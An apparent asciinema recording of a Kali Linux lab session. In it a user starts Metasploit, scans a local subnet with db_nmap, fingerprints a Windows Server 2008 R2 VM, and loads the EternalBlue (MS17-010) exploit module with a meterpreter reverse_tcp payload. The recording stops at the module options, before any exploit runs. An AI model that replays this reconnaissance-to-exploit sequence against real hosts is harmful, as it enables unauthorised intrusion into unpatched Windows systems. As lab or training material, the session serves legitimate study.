{"version": 2, "width": 188, "height": 37, "timestamp": 1645005216, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.040754, "o", "                                                                                                                                                                                            \r\r\u001b]0;root@kali: /home/kali\u0007"]
[0.056712, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34m┌──(\u001b[1m\u001b[34m\u001b[31mroot💀kali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m/home/kali\u001b[0m\u001b[34m]\r\n└─\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K"]
[0.056767, "o", "\u001b[?1h\u001b="]
[0.057272, "o", "\u001b[?2004h"]
[1.555856, "o", "\u001b[7m\u001b[32mip\u001b[39m\u001b[7m addr show\u001b[27m"]
[1.836681, "o", "\u001b[12D\u001b[27m\u001b[32mi\u001b[27m\u001b[32mp\u001b[39m\u001b[27m \u001b[27ma\u001b[27md\u001b[27md\u001b[27mr\u001b[27m \u001b[27ms\u001b[27mh\u001b[27mo\u001b[27mw"]
[1.836749, "o", "\u001b[?1l\u001b>"]
[1.839501, "o", "\u001b[?2004l\r\r\n"]
[1.840925, "o", "1: \u001b[36mlo: \u001b[0m<LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\r\n    link/loopback \u001b[33m00:00:00:00:00:00\u001b[0m brd \u001b[33m00:00:00:00:00:00\u001b[0m\r\n    inet \u001b[35m127.0.0.1\u001b[0m/8 scope host lo\r\n       valid_lft forever preferred_lft forever\r\n    inet6 \u001b[34m::1\u001b[0m/128 scope host \r\n       valid_lft forever preferred_lft forever\r\n2: \u001b[36meth0: \u001b[0m<BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state \u001b[32mUP \u001b[0mgroup default qlen 1000\r\n    link/ether \u001b[33m08:00:27:22:88:7d\u001b[0m brd \u001b[33mff:ff:ff:ff:ff:ff\u001b[0m\r\n    inet \u001b[35m10.0.2.15\u001b[0m/24 brd \u001b[35m10.0.2.255 \u001b[0mscope global dynamic noprefixroute eth0\r\n       valid_lft 538sec preferred_lft 538sec\r\n    inet6 \u001b[34mfe80::a00:27ff:fe22:887d\u001b[0m/64 scope link noprefixroute \r\n       valid_lft forever preferred_lft forever\r\n"]
[1.840962, "o", "                                                                                                                                                                                            \r\r"]
[1.841072, "o", "\u001b]0;root@kali: /home/kali\u0007\r\n"]
[1.85327, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34m┌──(\u001b[1m\u001b[34m\u001b[31mroot💀kali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m/home/kali\u001b[0m\u001b[34m]\r\n└─\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K"]
[1.853331, "o", "\u001b[?1h\u001b="]
[1.85385, "o", "\u001b[?2004h"]
[6.421498, "o", "\u001b[7m\u001b[32msystemctl\u001b[39m\u001b[7m start postgresql.service\u001b[27m"]
[6.421639, "o", "\u001b[38;2;153;153;153m \u001b[39m\b"]
[6.665407, "o", "\u001b[34D\u001b[27m\u001b[32ms\u001b[27m\u001b[32my\u001b[27m\u001b[32ms\u001b[27m\u001b[32mt\u001b[27m\u001b[32me\u001b[27m\u001b[32mm\u001b[27m\u001b[32mc\u001b[27m\u001b[32mt\u001b[27m\u001b[32ml\u001b[39m\u001b[27m \u001b[27ms\u001b[27mt\u001b[27ma\u001b[27mr\u001b[27mt\u001b[27m \u001b[27mp\u001b[27mo\u001b[27ms\u001b[27mt\u001b[27mg\u001b[27mr\u001b[27me\u001b[27ms\u001b[27mq\u001b[27ml\u001b[27m.\u001b[27ms\u001b[27me\u001b[27mr\u001b[27mv\u001b[27mi\u001b[27mc\u001b[27me\u001b[39m \b"]
[6.665454, "o", "\u001b[?1l\u001b>"]
[6.668061, "o", "\u001b[?2004l\r\r\n"]
[6.672072, "o", "                                                                                                                                                                                            \r\r"]
[6.672119, "o", "\u001b]0;root@kali: /home/kali\u0007\r\n"]
[6.68491, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34m┌──(\u001b[1m\u001b[34m\u001b[31mroot💀kali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m/home/kali\u001b[0m\u001b[34m]\r\n└─\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K"]
[6.684974, "o", "\u001b[?1h\u001b="]
[6.685513, "o", "\u001b[?2004h"]
[10.205594, "o", "\u001b[7m\u001b[32mmsfdb\u001b[39m\u001b[7m init\u001b[27m"]
[10.445397, "o", "\u001b[10D\u001b[27m\u001b[32mm\u001b[27m\u001b[32ms\u001b[27m\u001b[32mf\u001b[27m\u001b[32md\u001b[27m\u001b[32mb\u001b[39m\u001b[27m \u001b[27mi\u001b[27mn\u001b[27mi\u001b[27mt"]
[10.445568, "o", "\u001b[?1l\u001b>"]
[10.447081, "o", "\u001b[?2004l\r\r\n"]
[10.454798, "o", "\u001b[01;33m[i]\u001b[00m Database already started\r\n"]
[10.454849, "o", "\u001b[01;33m[i]\u001b[00m The database appears to be already configured, skipping initialization\r\n"]
[10.455203, "o", "                                                                                                                                                                                            \r\r"]
[10.455234, "o", "\u001b]0;root@kali: /home/kali\u0007"]
[10.455265, "o", "\r\n"]
[10.467923, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34m┌──(\u001b[1m\u001b[34m\u001b[31mroot💀kali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m/home/kali\u001b[0m\u001b[34m]\r\n└─\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K"]
[10.467969, "o", "\u001b[?1h\u001b="]
[10.468579, "o", "\u001b[?2004h"]
[14.014871, "o", "\u001b[7m\u001b[32mmsfconsole\u001b[27m\u001b[39m"]
[14.318658, "o", "\u001b[10D\u001b[27m\u001b[32mm\u001b[27m\u001b[32ms\u001b[27m\u001b[32mf\u001b[27m\u001b[32mc\u001b[27m\u001b[32mo\u001b[27m\u001b[32mn\u001b[27m\u001b[32ms\u001b[27m\u001b[32mo\u001b[27m\u001b[32ml\u001b[27m\u001b[32me\u001b[39m"]
[14.318919, "o", "\u001b[?1l\u001b>"]
[14.319826, "o", "\u001b[?2004l\r\r\n"]
[18.795043, "o", "[*] Starting the Metasploit Framework console.../\r"]
[18.900539, "o", "[*] Starting the Metasploit Framework console...-\r"]
[19.016546, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[19.237191, "o", "[*] starting the Metasploit Framework console...|\r"]
[19.39313, "o", "[*] STarting the Metasploit Framework console.../\r"]
[19.513033, "o", "[*] StArting the Metasploit Framework console...-\r"]
[19.628955, "o", "[*] StaRting the Metasploit Framework console...\\\r"]
[19.733262, "o", "[*] StarTing the Metasploit Framework console...|\r"]
[19.835239, "o", "[*] StartIng the Metasploit Framework console.../\r"]
[19.936281, "o", "[*] StartiNg the Metasploit Framework console...-\r"]
[20.046322, "o", "[*] StartinG the Metasploit Framework console...\\\r"]
[20.159861, "o", "[*] Starting the Metasploit Framework console...|\r"]
[20.260894, "o", "[*] Starting The Metasploit Framework console.../\r"]
[20.362469, "o", "[*] Starting tHe Metasploit Framework console...-\r"]
[20.46405, "o", "[*] Starting thE Metasploit Framework console...\\\r"]
[20.575956, "o", "[*] Starting the Metasploit Framework console...|\r"]
[20.670016, "o", "\r                                                  \r\n"]
[20.670432, "o", "\u001b[0m"]
[20.676304, "o", "\u001b[36m\u001b[0m\u001b[31m\r\n      .:okOOOkdc'           'cdkOOOko:.\r\n    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.\r\n   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:\r\n  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'\r\n  oOOOOOOOO.    .oOOOOoOOOOl.    ,OOOOOOOOo\r\n  dOOOOOOOO.      .cOOOOOc.      ,OOOOOOOOx\r\n  lOOOOOOOO.         ;d;         ,OOOOOOOOl\r\n  .OOOOOOOO.   .;           ;    ,OOOOOOOO.\r\n   cOOOOOOO.   .OOc.     'oOO.   ,OOOOOOOc\r\n    oOOOOOO.   .OOOO.   :OOOO.   ,OOOOOOo\r\n     lOOOOO.   .OOOO.   :OOOO.   ,OOOOOl\r\n      ;OOOO'   .OOOO.   :OOOO.   ;OOOO;\r\n       .dOOo   .OOOOocccxOOOO.   xOOd.\r\n         ,kOl  .OOOOOOOOOOOOO. .dOk,\r\n           :kk;.OOOOOOOOOOOOO.cOk:\r\n             ;kOOOOOOOOOOOOOOOk:\r\n               ,xOOOOOOOOOOOx,\r\n                 .lOOOOOOOl.\r\n                    ,dOd,\r\n                      .\u001b[0m\u001b[0m\r\n\r\n       =[ \u001b[33mmetasploit v6.1.28-dev\u001b[0m                          ]\r\n+ -- --=[ 2197 exploits - 1163 auxiliary - 400 post       ]\r\n+ -- --=[ 596 payloads - 45 encoders - 11 nops            ]\r\n+ -- --=[ 9 evasion  "]
[20.676375, "o", "                                     ]\r\n\r\nMetasploit tip: You can pivot connections over sessions \r\nstarted with the ssh_login modules\r\n\r\n"]
[20.747215, "o", "\u001b[?1034h"]
[20.774724, "o", "\u001b[4mmsf6\u001b[0m \u001b[0m> "]
[22.970773, "o", "d"]
[22.970826, "o", "b"]
[22.971006, "o", "_n"]
[22.971133, "o", "m"]
[22.971163, "o", "a"]
[22.971284, "o", "p"]
[22.97137, "o", " "]
[22.971452, "o", "1"]
[22.971585, "o", "0"]
[22.971668, "o", "."]
[22.971749, "o", "0"]
[22.971859, "o", "."]
[22.971991, "o", "2"]
[22.972132, "o", "."]
[22.972284, "o", "0"]
[22.972377, "o", "/"]
[22.972509, "o", "2"]
[22.972638, "o", "4"]
[22.972758, "o", " "]
[22.972969, "o", "-"]
[22.973161, "o", "s"]
[22.973282, "o", "n"]
[23.278461, "o", "\r\r\n"]
[23.284864, "o", "\u001b[0m"]
[23.299018, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-16 04:53 EST\r\n"]
[25.47293, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Nmap scan report for 10.0.2.1\r\n"]
[25.473118, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Host is up (0.00012s latency).\r\n"]
[25.473295, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: MAC Address: 52:54:00:12:35:00 (QEMU virtual NIC)\r\n"]
[25.473572, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Nmap scan report for 10.0.2.2\r\n"]
[25.47384, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Host is up (0.00010s latency).\r\n"]
[25.474055, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: MAC Address: 52:54:00:12:35:00 (QEMU virtual NIC)\r\n"]
[25.47426, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Nmap scan report for 10.0.2.3\r\n"]
[25.474533, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Host is up (0.000094s latency).\r\n"]
[25.474787, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: MAC Address: 08:00:27:DC:DA:28 (Oracle VirtualBox virtual NIC)\r\n"]
[25.474988, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Nmap scan report for 10.0.2.7\r\n"]
[25.475205, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Host is up (0.00021s latency).\r\n"]
[25.475422, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: MAC Address: 08:00:27:C9:34:62 (Oracle VirtualBox virtual NIC)\r\n"]
[25.475623, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Nmap scan report for 10.0.2.15\r\n"]
[25.475811, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Host is up.\r\n"]
[25.475996, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Nmap done: 256 IP addresses (5 hosts up) scanned in 2.18 seconds\r\n"]
[25.614609, "o", "\u001b[4mmsf6\u001b[0m \u001b[0m> "]
[28.4602, "o", "p"]
[28.460356, "o", "in"]
[28.460431, "o", "g"]
[28.460459, "o", " "]
[28.460547, "o", "1"]
[28.460647, "o", "0"]
[28.460765, "o", "."]
[28.460873, "o", "0"]
[28.460974, "o", "."]
[28.461082, "o", "2"]
[28.461201, "o", "."]
[28.461293, "o", "7"]
[28.461414, "o", " "]
[28.461501, "o", "-"]
[28.461684, "o", "c"]
[28.461877, "o", " "]
[28.462004, "o", "4"]
[28.804413, "o", "\r\r\n"]
[28.811353, "o", "\u001b[0m"]
[28.811782, "o", "\u001b[1m\u001b[34m[*]\u001b[0m exec: ping 10.0.2.7 -c 4\r\n"]
[28.812024, "o", "\r\n"]
[28.816716, "o", "PING 10.0.2.7 (10.0.2.7) 56(84) bytes of data.\r\n"]
[28.817322, "o", "64 bytes from 10.0.2.7: icmp_seq=1 ttl=128 time=0.471 ms\r\n"]
[29.839171, "o", "64 bytes from 10.0.2.7: icmp_seq=2 ttl=128 time=0.230 ms\r\n"]
[30.868609, "o", "64 bytes from 10.0.2.7: icmp_seq=3 ttl=128 time=0.228 ms\r\n"]
[31.886525, "o", "64 bytes from 10.0.2.7: icmp_seq=4 ttl=128 time=0.206 ms\r\n\r\n--- 10.0.2.7 ping statistics ---\r\n4 packets transmitted, 4 received, 0% packet loss, time 3071ms\r\nrtt min/avg/max/mdev = 0.206/0.283/0.471/0.108 ms\r\n"]
[31.916118, "o", "\u001b[4mmsf6\u001b[0m \u001b[0m> "]
[33.750037, "o", "d"]
[33.750186, "o", "b_"]
[33.750308, "o", "n"]
[33.75042, "o", "ma"]
[33.750523, "o", "p"]
[33.750617, "o", " "]
[33.750687, "o", "1"]
[33.750777, "o", "0"]
[33.750873, "o", "."]
[33.750977, "o", "0"]
[33.75106, "o", "."]
[33.751192, "o", "2"]
[33.751319, "o", "."]
[33.751414, "o", "7"]
[33.751546, "o", " "]
[33.751655, "o", "-"]
[33.751788, "o", "P"]
[33.751917, "o", "n"]
[33.752123, "o", " "]
[33.752282, "o", "-"]
[33.75244, "o", "n"]
[34.498525, "o", "\r\r\n"]
[34.504697, "o", "\u001b[0m"]
[34.542932, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-16 04:54 EST\r\n"]
[54.560337, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Nmap scan report for 10.0.2.7\r\n"]
[54.560719, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Host is up (0.00019s latency).\r\n"]
[54.560922, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Not shown: 976 closed tcp ports (reset)\r\n"]
[54.561125, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: PORT      STATE SERVICE\r\n"]
[54.561296, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 21/tcp    open  ftp\r\n"]
[54.561486, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 22/tcp    open  ssh\r\n"]
[54.561673, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 80/tcp    open  http\r\n"]
[54.562079, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 135/tcp   open  msrpc\r\n"]
[54.56227, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 139/tcp   open  netbios-ssn\r\n"]
[54.562475, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 445/tcp   open  microsoft-ds\r\n"]
[54.562676, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 3306/tcp  open  mysql\r\n"]
[54.562881, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 3389/tcp  open  ms-wbt-server\r\n"]
[54.563066, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 4848/tcp  open  appserv-http\r\n"]
[54.563248, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 7676/tcp  open  imqbrokerd\r\n"]
[54.563429, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 8009/tcp  open  ajp13\r\n"]
[54.563624, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 8022/tcp  open  oa-system\r\n"]
[54.56384, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 8031/tcp  open  unknown\r\n"]
[54.564017, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 8080/tcp  open  http-proxy\r\n"]
[54.564206, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 8181/tcp  open  intermapper\r\n"]
[54.564389, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 8383/tcp  open  m2mservices\r\n"]
[54.564588, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 8443/tcp  open  https-alt\r\n"]
[54.56478, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 9200/tcp  open  wap-wsp\r\n"]
[54.564972, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 49152/tcp open  unknown\r\n"]
[54.565168, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 49153/tcp open  unknown\r\n"]
[54.565335, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 49154/tcp open  unknown\r\n"]
[54.565526, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 49156/tcp open  unknown\r\n"]
[54.565811, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 49159/tcp open  unknown\r\n"]
[54.566014, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 49160/tcp open  unknown\r\n"]
[54.566193, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: MAC Address: 08:00:27:C9:34:62 (Oracle VirtualBox virtual NIC)\r\n"]
[54.566401, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Nmap done: 1 IP address (1 host up) scanned in 20.04 seconds\r\n"]
[55.632207, "o", "\u001b[4mmsf6\u001b[0m \u001b[0m> "]
[57.087771, "o", "d"]
[57.087915, "o", "b_"]
[57.087974, "o", "n"]
[57.088037, "o", "m"]
[57.088138, "o", "a"]
[57.088268, "o", "p "]
[57.088387, "o", "1"]
[57.088473, "o", "0"]
[57.088551, "o", "."]
[57.088642, "o", "0"]
[57.088715, "o", "."]
[57.088827, "o", "2"]
[57.088911, "o", "."]
[57.089023, "o", "7"]
[57.089134, "o", " "]
[57.089258, "o", "-"]
[57.089378, "o", "p"]
[57.089493, "o", " "]
[57.089778, "o", "4"]
[57.089902, "o", "4"]
[57.090022, "o", "5"]
[57.090167, "o", " "]
[57.090306, "o", "-"]
[57.090433, "o", "A"]
[58.521273, "o", "\r\r\n"]
[58.528625, "o", "\u001b[0m"]
[58.768557, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-16 04:54 EST\r\n"]
[72.071469, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Nmap scan report for 10.0.2.7\r\n"]
[72.071644, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Host is up (0.00020s latency).\r\n"]
[72.071812, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: PORT    STATE SERVICE      VERSION\r\n"]
[72.071987, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 445/tcp open  microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds\r\n"]
[72.072163, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: MAC Address: 08:00:27:C9:34:62 (Oracle VirtualBox virtual NIC)\r\n"]
[72.072363, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\r\n"]
[72.07254, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Device type: general purpose\r\n"]
[72.072813, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Running: Microsoft Windows 7|2008|8.1\r\n"]
[72.073014, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1\r\n"]
[72.073193, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1\r\n"]
[72.07337, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Network Distance: 1 hop\r\n"]
[72.073571, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Service Info: OS: Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows\r\n"]
[72.073918, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Host script results:\r\n"]
[72.074113, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_clock-skew: mean: 2h40m02s, deviation: 4h37m08s, median: 1s\r\n"]
[72.074306, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_nbstat: NetBIOS name: VAGRANT-2008R2, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:c9:34:62 (Oracle VirtualBox virtual NIC)\r\n"]
[72.07447, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: | smb2-security-mode:\r\n"]
[72.074634, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   2.1:\r\n"]
[72.074806, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_    Message signing enabled but not required\r\n"]
[72.074971, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: | smb2-time:\r\n"]
[72.075147, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   date: 2022-02-16T09:54:45\r\n"]
[72.075327, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_  start_date: 2022-02-16T09:53:06\r\n"]
[72.07549, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: | smb-security-mode:\r\n"]
[72.075655, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   account_used: guest\r\n"]
[72.075825, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   authentication_level: user\r\n"]
[72.075994, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   challenge_response: supported\r\n"]
[72.0762, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_  message_signing: disabled (dangerous, but default)\r\n"]
[72.076392, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: | smb-os-discovery:\r\n"]
[72.076565, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)\r\n"]
[72.07674, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1\r\n"]
[72.076906, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   Computer name: vagrant-2008R2\r\n"]
[72.077076, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   NetBIOS computer name: VAGRANT-2008R2\\x00\r\n"]
[72.077275, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   Workgroup: WORKGROUP\\x00\r\n"]
[72.077459, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_  System time: 2022-02-16T01:54:45-08:00\r\n"]
[72.077694, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: TRACEROUTE\r\n"]
[72.077906, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: HOP RTT     ADDRESS\r\n"]
[72.078076, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 1   0.20 ms 10.0.2.7\r\n"]
[72.078266, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .\r\n"]
[72.078445, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Nmap done: 1 IP address (1 host up) scanned in 13.53 seconds\r\n"]
[72.222247, "o", "\u001b[4mmsf6\u001b[0m \u001b[0m> "]
[75.38996, "o", "s"]
[75.390116, "o", "ea"]
[75.390206, "o", "r"]
[75.390272, "o", "c"]
[75.390338, "o", "h"]
[75.390436, "o", " "]
[75.390537, "o", "E"]
[75.390563, "o", "t"]
[75.390656, "o", "e"]
[75.390764, "o", "r"]
[75.39085, "o", "n"]
[75.390938, "o", "a"]
[75.391042, "o", "l"]
[75.391137, "o", "B"]
[75.39124, "o", "l"]
[75.391341, "o", "u"]
[75.391449, "o", "e"]
[76.044722, "o", "\r\r\n"]
[76.05176, "o", "\u001b[0m"]
[76.24126, "o", "\r\nMatching Modules\r\n================\r\n\r\n   #  Name                                      Disclosure Date  Rank     Check  Description\r\n   -  ----                                      ---------------  ----     -----  -----------\r\n   0  exploit/windows/smb/ms17_010_\u001b[45meternalblue\u001b[0m  2017-03-14       average  Yes    MS17-010 \u001b[45mEternalBlue\u001b[0m SMB Remote Windows Kernel Pool Corruption\r\n   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution\r\n   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution\r\n   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection\r\n   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       \u001b[32mgreat\u001b[0m    Yes    SMB DOUBLEPULSAR Remote Code Execution\r\n\r\n\r\n"]
[76.241438, "o", "Interact with a module by name or index. For example \u001b[32minfo 4\u001b[0m, \u001b[32muse 4\u001b[0m or \u001b[32muse exploit/windows/smb/smb_doublepulsar_rce\u001b[0m\r\n\r\n"]
[76.277382, "o", "\u001b[4mmsf6\u001b[0m \u001b[0m> "]
[81.401397, "o", "u"]
[81.401553, "o", "se"]
[81.401615, "o", " "]
[81.401687, "o", "e"]
[81.402026, "o", "x"]
[81.402109, "o", "p"]
[81.402192, "o", "l"]
[81.402262, "o", "o"]
[81.402359, "o", "i"]
[81.40245, "o", "t"]
[81.402569, "o", "/"]
[81.402641, "o", "w"]
[81.402745, "o", "i"]
[81.402868, "o", "n"]
[81.402974, "o", "d"]
[81.403105, "o", "o"]
[81.403249, "o", "w"]
[81.403362, "o", "s"]
[81.403492, "o", "/"]
[81.403708, "o", "s"]
[81.403838, "o", "m"]
[81.404004, "o", "b"]
[81.404149, "o", "/"]
[81.404287, "o", "m"]
[81.404414, "o", "s"]
[81.404594, "o", "1"]
[81.404747, "o", "7"]
[81.404928, "o", "_"]
[81.405099, "o", "0"]
[81.405282, "o", "1"]
[81.405455, "o", "0"]
[81.405638, "o", "_"]
[81.405935, "o", "e"]
[81.406121, "o", "t"]
[81.406317, "o", "e"]
[81.406503, "o", "r"]
[81.406689, "o", "n"]
[81.406917, "o", "a"]
[81.407112, "o", "l"]
[81.407404, "o", "b"]
[81.407608, "o", "l"]
[81.40782, "o", "u"]
[81.408029, "o", "e"]
[82.768489, "o", "\r\r\n"]
[82.77568, "o", "\u001b[0m"]
[83.027367, "o", "\u001b[1m\u001b[34m[*]\u001b[0m No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp\r\n"]
[83.06216, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mwindows/smb/ms17_010_eternalblue\u001b[0m) \u001b[0m> "]
[87.337627, "o", "s"]
[87.566353, "o", "h"]
[87.658059, "o", "o"]
[87.804409, "o", "w"]
[87.942239, "o", " "]
[88.056904, "o", "o"]
[88.170762, "o", "p"]
[88.353577, "o", "t"]
[88.435527, "o", "i"]
[88.635602, "o", "o"]
[88.87408, "o", "n"]
[88.993838, "o", "s"]
[89.185087, "o", "\r\r\n"]
[89.19277, "o", "\u001b[0m"]
[89.201837, "o", "\r\nModule options (exploit/windows/smb/ms17_010_eternalblue):\r\n\r\n   Name           Current Setting  Required  Description\r\n   ----           ---------------  --------  -----------\r\n   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit\r\n   RPORT          445              yes       The target port (TCP)\r\n   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target m\r\n                                             achines.\r\n   SMBPass                         no        (Optional) The password for the specified username\r\n   SMBUser                         no        (Optional) The username to authenticate as\r\n   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machi\r\n                    "]
[89.201972, "o", "                         nes.\r\n   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.\r\n\r\n"]
